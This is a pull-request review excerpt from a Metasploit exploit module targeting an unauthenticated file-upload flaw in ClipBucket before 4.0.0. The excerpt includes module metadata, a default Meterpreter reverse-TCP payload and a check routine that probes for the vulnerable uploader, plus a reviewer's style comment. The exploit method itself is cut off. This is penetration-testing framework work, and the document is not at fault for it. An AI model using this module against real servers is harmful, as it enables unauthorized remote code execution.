modules/exploits/multi/http/clipbucket_fileupload_exec.rb

```diff
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ClipBucket Unauthenticated Arbitrary File Upload lower than 4.0.0 - Release 4902",
+      'Description'    => %q{
+        This module exploits a vulnerability found in ClipBucket version  Lower than 4.0.0 - Release 4902.
+        A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack.
+        It is possible for an attacker to upload a malicious script to issue operating system commands.
+        this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket [lt] 4.0.0 - Release 4902 in Windows7 and Kali Linux .
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'www.sec-consult.com', # Vulnerability Discovery, PoC
+          'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          [ 'EDB', '44250' ]
+        ],
+      'DefaultOptions' =>
+          {
+            'SSL'     => false,
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'Encoder' => 'php/base64'
+          },
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         =>
+        [
+          ['Clipbucket < 4.0.0 - Release 4902', {}]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => "Mar 03 2018",
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+       OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
+      ])
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    # Check version
+    peer = "#{rhost}:#{rport}"
+
+    vprint_status("Trying to detect ClipBucket on target.")
+
+    res = send_request_cgi({
+     'method' => 'GET',
+     'uri'    => normalize_uri(uri, "readme")
+    })
+
+    res2 = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(uri, "actions", "beats_uploader.php")
+    })
+
+    if res and res.code == 200 and res.body =~ /ClipBucket/ and res2.code == 200
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status("Version NOT detected")
+
+  end
+
+  def exploit
+    peer = "#{rhost}:#{rport}"
```

Comment:
`peer = "#{rhost}:#{rport}"` is not required as the `peer` variable is available by default in modules which make use of the `Msf::Exploit::Remote::HttpClient` mixin.